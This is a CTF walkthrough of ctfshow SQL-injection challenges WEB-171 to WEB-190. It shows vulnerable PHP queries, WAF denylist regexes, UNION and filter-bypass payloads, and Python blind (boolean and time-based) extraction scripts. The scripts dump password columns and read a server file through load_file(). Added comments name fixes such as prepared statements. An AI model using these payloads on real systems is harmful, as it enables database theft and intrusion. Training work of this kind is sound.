仅供学习参考,禁止用于其他非法途径
WEB-171
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped.
// The fix is a prepared statement with a bound parameter, not response filtering.
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
payload:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
1' union select id,username,password from ctfshow_user --+
WEB-172
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix.
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag
// Output-side check only: it inspects the username column of the returned row,
// so it does nothing about the query input itself.
if($row->username!=='flag'){
$ret['msg']='查询成功';
}
payload:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+
1' union select hex(username),password from ctfshow_user2 --+
WEB-173
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix.
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag
// Output filter: rejects any response whose JSON encoding contains "flag"
// (case-insensitive). It examines output, not the query input.
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}
payload:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user3' --+
1' union select hex(id),hex(username),hex(password) from ctfshow_user3 --+
WEB-174
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix.
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag
// Output filter: rejects any response whose JSON encoding contains "flag"
// or any decimal digit (case-insensitive). It examines output, not the input.
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
payload:
import requests
url = "http://43fcdabd-c874-4eff-aba9-7f5a39e7d3d0.challenge.ctf.show/api/v4.php?id="
# Characters recovered so far.
flag = ""
# Candidate alphabet tried at each position.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Boolean-based blind extraction for WEB-174. The output filter above blocks
# "flag" and every digit from being echoed, so nothing is read from the
# response body; the only signal used is whether 'admin' appears in the page,
# i.e. whether the appended condition was true. Positions 1..45 are probed.
# Defensive takeaway: a response filter is not a control against injection;
# a true/false difference in the response is enough to infer the data.
# NOTE: indentation was lost in this listing; loop and if bodies appear flat.
for i in range(1,46):
for j in dirt:
#payload = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload = 'group_concat(column_name) from information_schema.columns where table_name="ctfshow_user4"'
# Inner SELECT to read from (the two commented lines above were used first
# to enumerate the table and column names).
payload = 'password from ctfshow_user4 where username="flag"'
# Compares one character at position i with candidate j.
payload = '''1' and substr((select {}),{},1)="{}"--+'''.format(payload,i,j)
payload = url + payload
print(payload + flag)
res = requests.get(payload)
# Oracle: 'admin' is present in the response when the condition held.
if 'admin' in res.text:
flag += j
print(flag)
break
WEB-175
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix.
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag
// Output filter: rejects any response whose JSON encoding contains an ASCII
// byte (0x00-0x7f). It examines output, not the query input.
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}
payload:
import requests
import time
url = "http://ec5964c7-abfc-4994-b944-4cdc22fe9cfa.challenge.ctf.show/api/v5.php?id="
# Characters recovered so far.
flag = ""
# Candidate alphabet tried at each position.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Time-based blind extraction for WEB-175. The output filter above rejects any
# ASCII byte, so the response body carries no signal; the script measures
# latency instead, with if(...,sleep(3),0) delaying the reply by ~3 s when the
# comparison is true.
# Detection note: a burst of requests to one endpoint, each taking ~3 s, one
# per candidate character, is a characteristic time-based injection pattern;
# request-rate limits and query-time limits both blunt it.
# NOTE: indentation was lost in this listing; loop and if bodies appear flat.
for i in range(1,46):
for j in dirt:
# Wall-clock start of this probe.
a = time.time()
#payload = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
#payload = 'group_concat(column_name) from information_schema.columns where table_name="ctfshow_user5"'
# Inner SELECT to read from (the two commented lines above were used first
# to enumerate the table and column names).
payload = 'password from ctfshow_user5 where username="flag"'
payload = '''1' and if(substr((select {}),{},1)="{}",sleep(3),0)--+'''.format(payload,i,j)
payload = url + payload
print(payload + flag)
res = requests.get(payload)
b = time.time()
# 2.5 s threshold sits below the 3 s sleep to leave margin for jitter.
if (b - a) >= 2.5:
flag += j
print(flag)
break
WEB-176
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter on the raw parameter; the body is withheld by the challenge
// author, so the actual rule set is not visible here.
function waf($str){
// Code too simple to be worth showing
}
payload:
1' or 1=1 --+
WEB-177
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter on the raw parameter; the body is withheld by the challenge
// author, so the actual rule set is not visible here.
function waf($str){
// Code too simple to be worth showing
}
过滤了空格
payload:
1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23
WEB-178
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter on the raw parameter; the body is withheld by the challenge
// author, so the actual rule set is not visible here.
function waf($str){
// Code too simple to be worth showing
}
payload:
1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23
WEB-179
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter on the raw parameter; the body is withheld by the challenge
// author, so the actual rule set is not visible here.
function waf($str){
// Code too simple to be worth showing
}
过滤了空格,%09
payload:
1'%0cunion%0cselect%0c1,2,group_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()%0c%23
1'%0cunion%0cselect%0c1,2,group_concat(column_name)%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_name='ctfshow_user'%0c%23
1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%0c%23
WEB-180
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter on the raw parameter; the body is withheld by the challenge
// author, so the actual rule set is not visible here.
function waf($str){
// Code too simple to be worth showing
}
payload:
api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1
WEB-181
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter: returns preg_match()'s result, i.e. 1 when $str contains a
// space, '*', the control bytes 0x09-0x0d, NUL, 0xa0, '#', or the keywords
// file / into / select (case-insensitive). A denylist of this kind is not a
// substitute for parameterized queries.
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
}
payload:
api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1
WEB-182
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_GET['id'] is spliced into the query string unescaped;
// a prepared statement with a bound parameter is the fix, whatever waf() rejects.
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
// The incoming parameter is filtered
// Denylist filter: returns preg_match()'s result, i.e. 1 when $str contains a
// space, '*', the control bytes 0x09-0x0d, NUL, 0xa0, '#', or the keywords
// file / into / select / flag (case-insensitive). A denylist of this kind is
// not a substitute for parameterized queries.
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
}
payload:
api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1
WEB-183
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_POST['tableName'] is used verbatim as the FROM target.
// A table name cannot be bound as a query parameter, so the fix is to accept
// only names from a fixed allow-list rather than filtering free text.
$sql = "select count(pass) from ".$_POST['tableName'].";";
// The incoming parameter is filtered
// Denylist filter: returns preg_match()'s result, i.e. 1 when $str contains a
// space, '*', control whitespace bytes, 0xa0, NUL, '#', '=', '|', or one of
// the listed keywords (case-insensitive).
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
}
// Returns the total record count of the user table
$user_count = 0;
payload:
import requests
# Session object is created but not used below (requests.post is called directly).
s = requests.session()
url = "http://601333f9-6b46-44b1-9696-99b072b8d352.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
# Known prefix; i starts at 8 because len("ctfshow{") == 8.
flag = "ctfshow{"
# Candidate alphabet tried at each position.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Boolean-based blind extraction for WEB-183 through the tableName POST field,
# which the challenge concatenates after "from". Each probe compares
# LEFT(pass, i) with the current prefix plus candidate j; the row count echoed
# in the page ("$user_count = 1;") is the oracle.
# Mitigation: a table name must be matched against a fixed allow-list; a
# keyword denylist on free text does not prevent this.
# NOTE: indentation was lost in this listing; loop and if bodies appear flat.
for i in range(8,46):
for j in dirt:
data['tableName'] = "(ctfshow_user)where(left(pass,{}))like'{}'".format(i,flag + j)
res = requests.post(url,data=data)
print(j)
if '$user_count = 1;' in res.text:
flag += j
print(flag)
break
WEB-184
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_POST['tableName'] is used verbatim as the FROM target.
// A table name cannot be bound as a query parameter, so the fix is to accept
// only names from a fixed allow-list rather than filtering free text.
$sql = "select count(*) from ".$_POST['tableName'].";";
// The incoming parameter is filtered
// Denylist filter: returns preg_match()'s result, i.e. 1 when $str contains
// '*', control whitespace bytes, 0xa0, NUL, '#', '=', '|', '&', quotes,
// backticks, or one of the listed keywords (case-insensitive). Note the plain
// space character is no longer on this list.
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}
// Returns the total record count of the user table
$user_count = 0;
payload:
import requests
# Session object is created but not used below (requests.post is called directly).
s = requests.session()
url = "http://2f26a0e7-8a44-47b8-bbe7-6d1aa82aa558.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
# Known prefix; extraction starts at position 9, the first unknown character.
flag = "ctfshow{"
# Candidate alphabet tried at each position.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Boolean-based blind extraction for WEB-184 through the tableName POST field.
# The probe is a self-join whose ON condition compares one character of pass
# (via regexp against char(k)) with candidate j; the row count echoed in the
# page is the oracle. The expected "43" is challenge-specific — presumably the
# count produced when the join condition matches; verify against the target.
# Mitigation: a table name must be matched against a fixed allow-list.
# NOTE: indentation was lost in this listing; loop and if bodies appear flat.
for i in range(9,46):
for j in dirt:
# ASCII code of the candidate, passed to char().
k = ord(j)
data['tableName'] = "ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{},1)regexp(char({})))".format(i,k)
res = requests.post(url,data=data)
print(j)
if '$user_count = 43;' in res.text:
flag += j
print(flag)
break
WEB-185
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_POST['tableName'] is used verbatim as the FROM target.
// A table name cannot be bound as a query parameter, so the fix is to accept
// only names from a fixed allow-list rather than filtering free text.
$sql = "select count(*) from ".$_POST['tableName'].";";
// The incoming parameter is filtered
// Denylist filter: as in WEB-184, plus every decimal digit ([0-9]) is rejected.
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}
// Returns the total record count of the user table
$user_count = 0;
payload:
import requests
# Session object is created but not used below (requests.post is called directly).
s = requests.session()
url = "http://cf339e07-f61c-429a-95ed-e6c0eb4f34fd.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
# Known prefix; extraction starts at position 9, the first unknown character.
flag = "ctfshow{"
# Candidate alphabet tried at each position.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Return 'true' followed by '+true' repeated n-1 times (n copies in total);
# for n <= 1 the result is just 'true'. Used wherever the probe needs a number,
# because the filter for this level rejects every decimal digit.
# NOTE: indentation was lost in this listing; the function body appears flat.
def true(n: int) -> str:
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n-1):
num+='+true'
return num
# Same self-join oracle as WEB-184 ("$user_count = 43;"), with every numeric
# argument spelled via true() instead of a literal.
# Mitigation: a table name must be matched against a fixed allow-list.
for i in range(9,46):
for j in dirt:
# ASCII code of the candidate, passed to char().
k = ord(j)
data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{true(i)},{true(1)})regexp(char({true(k)})))"
res = requests.post(url,data=data)
print(j)
if '$user_count = 43;' in res.text:
flag += j
print(flag)
break
WEB-186
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: $_POST['tableName'] is used verbatim as the FROM target.
// A table name cannot be bound as a query parameter, so the fix is to accept
// only names from a fixed allow-list rather than filtering free text.
$sql = "select count(*) from ".$_POST['tableName'].";";
// The incoming parameter is filtered
// Denylist filter: as in WEB-185, plus '%', '<', '>' and '^' are rejected.
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}
// Returns the total record count of the user table
$user_count = 0;
payload:
import requests
# Session object is created but not used below (requests.post is called directly).
s = requests.session()
url = "http://aa84b762-1ddb-4b0a-926c-6c2aa357ee60.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
# Known prefix; extraction starts at position 9, the first unknown character.
flag = "ctfshow{"
# Candidate alphabet tried at each position.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Return 'true' followed by '+true' repeated n-1 times (n copies in total);
# for n <= 1 the result is just 'true'. Used wherever the probe needs a number,
# because the filter for this level rejects every decimal digit.
# NOTE: indentation was lost in this listing; the function body appears flat.
def true(n: int) -> str:
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n-1):
num+='+true'
return num
# Identical to the WEB-185 script: the added filter characters for WEB-186
# ('%', '<', '>', '^') do not appear in this probe, so it is unchanged.
# Mitigation: a table name must be matched against a fixed allow-list.
for i in range(9,46):
for j in dirt:
# ASCII code of the candidate, passed to char().
k = ord(j)
data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{true(i)},{true(1)})regexp(char({true(k)})))"
res = requests.post(url,data=data)
print(j)
if '$user_count = 43;' in res.text:
flag += j
print(flag)
break
WEB-187
// Concatenate the SQL statement to look up the user with the given ID
// Both $username and $password are interpolated into the query string rather
// than bound as parameters. (As excerpted the query line precedes the
// assignments; presumably the real source builds it afterwards.)
$sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
$username = $_POST['username'];
// md5(..., true) returns the raw 16-byte digest, not a hex string; that binary
// value is what ends up inside the quoted password literal above.
$password = md5($_POST['password'],true);
// Only admin can obtain the flag
if($username!='admin'){
$ret['msg']='用户名不存在';
die(json_encode($ret));
}
payload:
用户:admin 密码:ffifdyop
WEB-188
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: {$username} is interpolated without quotes, so the value is
// parsed as a SQL expression rather than a string; bind it as a parameter.
$sql = "select pass from ctfshow_user where username = {$username}";
// Username check
// Denylist on the username; rejects the listed keywords, comma, parentheses
// and quotes (case-insensitive).
if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}
// Password check
// Accepts anything is_numeric() accepts (integers, floats, exponent notation).
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
// Password comparison
// Loose (==) comparison of the stored pass against intval($password);
// a strict (===) comparison of a properly hashed value would be the norm.
if($row['pass']==intval($password)){
$ret['msg']='登陆成功';
array_push($ret['data'], array('flag'=>$flag));
}
payload:
用户:0 密码:0
WEB-189
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: {$username} is interpolated without quotes, so the value is
// parsed as a SQL expression rather than a string; bind it as a parameter.
$sql = "select pass from ctfshow_user where username = {$username}";
// Username check
// Denylist on the username: the listed keywords, space, '*', control
// whitespace bytes, 0xa0, NUL, '&' and '|' (case-insensitive).
if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}
// Password check
// Accepts anything is_numeric() accepts (integers, floats, exponent notation).
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
// Password comparison
// Loose (==) comparison between the stored pass and the numeric-string
// password; a strict comparison of a hashed value would be the norm.
if($row['pass']==$password){
$ret['msg']='登陆成功';
}
payload:
import requests
url = 'http://e32b038a-f47c-4fd9-bede-e7ebae1e0506.challenge.ctf.show/api/'
# password is a fixed numeric value so the is_numeric() check passes; the
# username field carries the injected expression (interpolated unquoted by
# the challenge, see the $sql line above). The oracle in both functions is
# whether the response message equals "密码错误" (wrong password).
data = {'username':'','password':123}
# Binary-search the offset at which 'ctfshow' first appears in the file read
# by MySQL's load_file() and return the final midpoint. Because the file is
# read by the database server, the mitigation is on the DB side: deny the
# application account the FILE privilege and restrict secure_file_priv.
# NOTE: indentation was lost in this listing; function bodies appear flat.
def getIndex() -> int:
start = 1
tail = 300
mid = (start + tail) //2
while start < tail:
mid = (start + tail) //2
data['username'] = "if(locate('ctfshow',load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid))
res = requests.post(url,data=data)
if "密码错误" in res.json()['msg']:
start = mid + 1
else:
tail = mid
return mid
# Recover the 45 characters that follow offset num, one position at a time,
# keeping the candidate whose probe does not yield "密码错误". Prints progress;
# returns nothing.
def getFlag(num: int) -> None:
flag = ''
for i in range(int(num)+1,int(num)+46):
for j in r'1234567890qazwsxedcrfvtgbyhnujmiklop':
data['username'] = 'if(ascii(substr(load_file("/var/www/html/api/index.php"),%d,1))!=%d,0,1)' % (i, ord(j))
res = requests.post(url,data=data)
if "密码错误" != res.json()['msg']:
flag += j
print(flag)
break
getFlag(getIndex())
WEB-190
// Concatenate the SQL statement to look up the user with the given ID
// Injection point: {$username} is interpolated inside single quotes but never
// escaped or bound, and unlike earlier levels there is no username check at all.
$sql = "select pass from ctfshow_user where username = '{$username}'";
// Password check
// Accepts anything is_numeric() accepts (integers, floats, exponent notation).
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
// Password comparison
// Loose (==) comparison between the stored pass and the numeric-string
// password; a strict comparison of a hashed value would be the norm.
if($row['pass']==$password){
$ret['msg']='登陆成功';
}
// TODO: feels like something is missing here, odd
payload:
import requests
url = 'http://5a06a32e-8ee9-4c40-bbb7-de12a6c92342.challenge.ctf.show/api/'
# password is a fixed numeric value so the is_numeric() check passes; the
# username field carries the injected condition.
data = {'username':'','password':123}
# Characters recovered so far.
flag = ''
# Boolean-based blind extraction for WEB-190: for each position 1..45, binary
# search the ASCII code (32..127) of the character selected from
# ctfshow_fl0g.f1ag, using whether the message is "密码错误" as the oracle.
# When the inner loop ends, first holds the character's code.
# Mitigation: the username must be bound as a query parameter.
# NOTE: indentation was lost in this listing; loop bodies appear flat.
for i in range(1,46):
first = 32
tail = 127
while first < tail:
mid = (first + tail) // 2
data['username'] = f"admin' and if(ascii(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
res = requests.post(url,data=data)
# A "wrong password" reply means the condition was true, so the code is > mid.
if '密码错误' in res.json()['msg']:
first = mid + 1
else:
tail = mid
flag = flag + chr(first)
print(flag)